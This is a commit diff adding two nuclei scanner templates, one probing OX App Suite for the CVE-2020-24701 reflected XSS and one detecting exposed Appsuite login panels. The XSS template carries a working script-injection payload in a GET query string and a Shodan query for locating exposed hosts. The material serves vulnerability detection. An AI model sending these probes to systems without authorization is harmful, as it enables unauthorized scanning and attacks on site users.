Merge pull request #8571 from projectdiscovery/ox-appsuite

( CVE-2020-24701) OX Appsuite - Cross-Site Scripting & Login Panel 🔥
2023-11-09 15:58:43 +05:30 · 2023-11-09 15:58:43 +05:30 · c36c41ac9e
parent d4ec62a18b c73509d02e
commit c36c41ac9e
2 changed files with 80 additions and 0 deletions
--- a/http/cves/2020/CVE-2020-24701.yaml
+++ b/http/cves/2020/CVE-2020-24701.yaml
@ -0,0 +1,49 @@
+id: CVE-2020-24701
+
+info:
+  name: OX Appsuite - Cross-Site Scripting
+  author: DhiyaneshDk
+  severity: medium
+  description: |
+    OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).
+  reference:
+    - https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html
+    - https://seclists.org/fulldisclosure/2021/Jul/33
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24701
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-24701
+    cwe-id: CWE-79
+    epss-score: 0.00513
+    epss-percentile: 0.74074
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: html:"Appsuite"
+    vendor: open-xchange
+    product: open-xchange_appsuite
+  tags: cve,cve2020,appsuite,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Request with action all'
+          - '<script>alert(document.domain);</script>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
--- a/http/exposed-panels/appsuite-panel.yaml
+++ b/http/exposed-panels/appsuite-panel.yaml
@ -0,0 +1,31 @@
+id: appsuite-panel
+
+info:
+  name: Appsuite Login Panel - Detect
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"Appsuite"
+  tags: panel,appsuite,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/appsuite/"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/appsuite"
+          - "io-ox-login"
+        condition: and
+
+      - type: status
+        status:
+          - 200